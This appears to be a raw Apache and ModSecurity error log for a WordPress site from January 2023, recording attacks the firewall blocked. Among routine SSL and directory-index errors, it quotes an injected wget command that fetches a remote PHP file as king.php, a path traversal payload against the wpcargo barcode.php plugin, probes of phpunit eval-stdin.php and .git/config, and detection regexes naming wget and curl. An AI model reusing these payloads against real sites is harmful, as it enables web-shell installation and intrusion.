"/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:2: wget https:/pst.klgrth.io/paste/e7yx8/raw -O king.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/x.php"] [unique_id "Y8PhmFKtPnYRlxqYLKyI6AAAAIs"], referer: www.google.com [Sun Jan 15 06:50:05.444145 2023] [:error] [pid 31462:tid 140365403240192] [client 5.75.199.140:42820] [client 5.75.199.140] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=../../../x.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wpcargo/includes/barcode.php"] [unique_id "Y8Pobc_63pWztXBWSdnqNQAAAMo"], referer: www.google.com [Sun Jan 15 06:50:06.868192 2023] [:error] [pid 31462:tid 140365386454784] [client 5.75.199.140:42824] [client 5.75.199.140] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:2. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:2: wget https:/pst.klgrth.io/paste/e7yx8/raw -O king.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/x.php"] [unique_id "Y8Pobs_63pWztXBWSdnqNgAAAMw"], referer: www.google.com [Sun Jan 15 10:34:48.271253 2023] [autoindex:error] [pid 31462:tid 140365428418304] [client 92.205.56.212:49070] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Jan 15 13:41:52.604560 2023] [:error] [pid 30554:tid 140365544101632] [client 116.203.31.94:54492] [client 116.203.31.94] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "29"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "Y8RI8O4mYz1-uZ654k3bQwAAAEI"], referer: anonymousfox.co [Sun Jan 15 15:12:06.250513 2023] [autoindex:error] [pid 31462:tid 140365535708928] [client 51.79.55.183:56906] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/ID3/index.php 2023/01/15 17:16:51 [error] 30412#30412: *236525 access forbidden by rule, client: 18.117.236.86, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Sun Jan 15 23:56:34.330617 2023] [ssl:warn] [pid 16490:tid 140123083642752] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 15 23:56:34.454781 2023] [ssl:warn] [pid 16491:tid 140123083642752] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 15 23:56:34.934012 2023] [ssl:warn] [pid 16491:tid 140123083642752] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 15 23:56:37.006827 2023] [ssl:warn] [pid 16491:tid 140123083642752] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 15 23:56:40.645574 2023] [ssl:warn] [pid 17003:tid 140358283315072] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 15 23:56:40.776190 2023] [ssl:warn] [pid 17004:tid 140358283315072] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 16 01:18:40.988266 2023] [ssl:warn] [pid 1008:tid 139715989014400] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 16 01:18:41.601788 2023] [ssl:warn] [pid 1097:tid 139715989014400] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 16 01:37:08.201651 2023] [ssl:warn] [pid 1000:tid 140460978808704] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 16 01:37:08.610504 2023] [ssl:warn] [pid 1108:tid 140460978808704] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 16 01:46:48.343603 2023] [ssl:warn] [pid 9789:tid 140264733738880] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 16 01:46:48.455671 2023] [ssl:warn] [pid 9791:tid 140264733738880] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 16 01:48:05.001706 2023] [ssl:warn] [pid 10410:tid 139666039617408] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 16 01:48:05.126014 2023] [ssl:warn] [pid 10411:tid 139666039617408] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 16 02:00:23.709233 2023] [ssl:warn] [pid 15214:tid 140421314484096] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 16 02:00:23.817624 2023] [ssl:warn] [pid 15215:tid 140421314484096] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 16 02:20:34.600964 2023] [ssl:warn] [pid 15215:tid 140421314484096] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 16 02:22:47.823725 2023] [ssl:warn] [pid 15215:tid 140421314484096] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 16 02:23:12.181856 2023] [ssl:warn] [pid 15215:tid 140421314484096] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 16 02:24:33.132176 2023] [ssl:warn] [pid 15215:tid 140421314484096] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 16 02:28:23.944388 2023] [ssl:warn] [pid 30601:tid 139904383108992] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 16 02:28:24.058155 2023] [ssl:warn] [pid 30602:tid 139904383108992] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 16 03:23:21.904135 2023] [ssl:warn] [pid 1886:tid 140290941982592] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 16 03:23:22.065352 2023] [ssl:warn] [pid 1887:tid 140290941982592] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 16 03:23:22.409134 2023] [ssl:warn] [pid 1887:tid 140290941982592] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 16 03:23:23.967109 2023] [ssl:warn] [pid 1887:tid 140290941982592] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 16 03:23:27.564882 2023] [ssl:warn] [pid 2331:tid 139634172401536] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 16 03:23:27.678357 2023] [ssl:warn] [pid 2332:tid 139634172401536] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 16 08:24:31.237558 2023] [:error] [pid 2945:tid 139633849513728] [client 5.188.62.174:41226] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y8VQDzu0YHvdY27yky_i_wAAAMg"] 2023/01/16 11:19:20 [error] 2185#2185: *15279 access forbidden by rule, client: 18.184.139.87, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Jan 16 18:34:47.246549 2023] [autoindex:error] [pid 2354:tid 139633874691840] [client 75.119.157.105:36594] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Jan 16 18:34:50.606973 2023] [autoindex:error] [pid 2945:tid 139633974994688] [client 198.199.72.235:36608] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Jan 17 01:57:31.475621 2023] [autoindex:error] [pid 2945:tid 139633991780096] [client 139.162.34.134:53152] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Jan 17 03:47:31.317852 2023] [ssl:warn] [pid 14028:tid 140139530164096] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 17 03:47:31.447456 2023] [ssl:warn] [pid 14029:tid 140139530164096] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 17 03:47:31.788410 2023] [ssl:warn] [pid 14029:tid 140139530164096] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 17 03:47:33.269292 2023] [ssl:warn] [pid 14029:tid 140139530164096] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 17 03:47:35.584149 2023] [ssl:warn] [pid 14445:tid 140508741470080] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 17 03:47:35.692420 2023] [ssl:warn] [pid 14446:tid 140508741470080] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 17 08:56:31.442903 2023] [autoindex:error] [pid 14465:tid 140508544063232] [client 80.76.51.29:40854] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Jan 17 08:57:02.970477 2023] [autoindex:error] [pid 15051:tid 140508361873152] [client 80.76.51.29:40882] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Jan 17 13:31:29.713427 2023] [autoindex:error] [pid 15051:tid 140508336695040] [client 43.153.117.39:51184] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Jan 17 17:33:37.396541 2023] [autoindex:error] [pid 15051:tid 140508412229376] [client 43.130.151.32:46534] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Jan 17 18:21:55.932527 2023] [:error] [pid 14465:tid 140508387051264] [client 5.188.62.26:48970] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y8ctk1t98lbZQOnIowbxegAAAIw"] [Tue Jan 17 23:40:17.322542 2023] [:error] [pid 15051:tid 140508420622080] [client 5.188.62.76:36640] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y8d4MSNqFYPceCNsiNYZHwAAAMg"] [Wed Jan 18 03:40:44.142960 2023] [ssl:warn] [pid 15189:tid 140533063522176] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 18 03:40:44.296371 2023] [ssl:warn] [pid 15191:tid 140533063522176] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 18 03:40:44.515356 2023] [ssl:warn] [pid 15191:tid 140533063522176] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 18 03:40:46.052491 2023] [ssl:warn] [pid 15191:tid 140533063522176] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 18 03:40:48.312415 2023] [ssl:warn] [pid 15634:tid 139764761610112] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 18 03:40:48.427626 2023] [ssl:warn] [pid 15635:tid 139764761610112] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 18 23:12:47.294733 2023] [:error] [pid 15654:tid 139764564203264] [client 78.47.249.247:48170] [client 78.47.249.247] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "29"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "Y8jDP4CLosH6rwPxy3-dmQAAAII"], referer: anonymousfox.co [Thu Jan 19 03:28:25.876173 2023] [ssl:warn] [pid 2511:tid 139947413718912] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 19 03:28:25.998178 2023] [ssl:warn] [pid 2512:tid 139947413718912] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 19 03:28:26.364125 2023] [ssl:warn] [pid 2512:tid 139947413718912] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 19 03:28:28.281285 2023] [ssl:warn] [pid 2512:tid 139947413718912] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 19 03:28:30.705684 2023] [ssl:warn] [pid 2958:tid 140680688396160] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 19 03:28:30.824410 2023] [ssl:warn] [pid 2959:tid 140680688396160] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 19 21:56:52.639566 2023] [autoindex:error] [pid 3187:tid 140680345138944] [client 78.47.249.247:56724] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jan 19 21:56:55.015417 2023] [autoindex:error] [pid 2981:tid 140680252819200] [client 78.47.249.247:56726] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jan 19 21:56:57.186819 2023] [autoindex:error] [pid 3187:tid 140680303175424] [client 78.47.249.247:56730] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jan 19 21:56:58.777254 2023] [autoindex:error] [pid 3187:tid 140680286390016] [client 78.47.249.247:56732] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jan 19 21:57:01.142683 2023] [autoindex:error] [pid 2981:tid 140680490989312] [client 78.47.249.247:56734] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jan 19 21:57:03.098522 2023] [autoindex:error] [pid 2978:tid 140680457418496] [client 78.47.249.247:56736] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jan 19 21:57:05.195988 2023] [autoindex:error] [pid 2981:tid 140680336746240] [client 78.47.249.247:56738] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jan 19 21:57:06.012925 2023] [autoindex:error] [pid 2981:tid 140680277997312] [client 78.47.249.247:56740] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jan 19 21:57:08.427161 2023] [autoindex:error] [pid 3187:tid 140680336746240] [client 78.47.249.247:56742] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jan 19 21:57:10.513124 2023] [autoindex:error] [pid 2977:tid 140680303175424] [client 78.47.249.247:56744] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jan 19 21:57:12.678787 2023] [autoindex:error] [pid 2977:tid 140680507774720] [client 78.47.249.247:56746] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jan 19 21:57:14.545182 2023] [autoindex:error] [pid 2977:tid 140680370317056] [client 78.47.249.247:56748] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jan 19 21:58:12.536315 2023] [autoindex:error] [pid 2981:tid 140680378709760] [client 78.47.249.247:56816] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jan 19 21:58:14.344093 2023] [autoindex:error] [pid 3187:tid 140680499382016] [client 78.47.249.247:56824] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jan 20 03:42:41.477122 2023] [ssl:warn] [pid 13848:tid 140645248944000] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 20 03:42:41.628315 2023] [ssl:warn] [pid 13849:tid 140645248944000] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 20 03:42:41.993830 2023] [ssl:warn] [pid 13849:tid 140645248944000] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 20 03:42:43.485762 2023] [ssl:warn] [pid 13849:tid 140645248944000] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 20 03:42:46.146783 2023] [ssl:warn] [pid 14293:tid 140206374901632] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 20 03:42:46.285059 2023] [ssl:warn] [pid 14294:tid 140206374901632] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 20 05:01:47.345339 2023] [autoindex:error] [pid 14568:tid 140205977691904] [client 168.119.149.8:44686] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/js/index.php [Fri Jan 20 05:57:54.620726 2023] [autoindex:error] [pid 14568:tid 140206011262720] [client 43.153.116.131:46664] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Jan 20 09:49:57.504543 2023] [autoindex:error] [pid 14313:tid 140205918942976] [client 205.166.94.17:55164] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Decode/HTML/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden 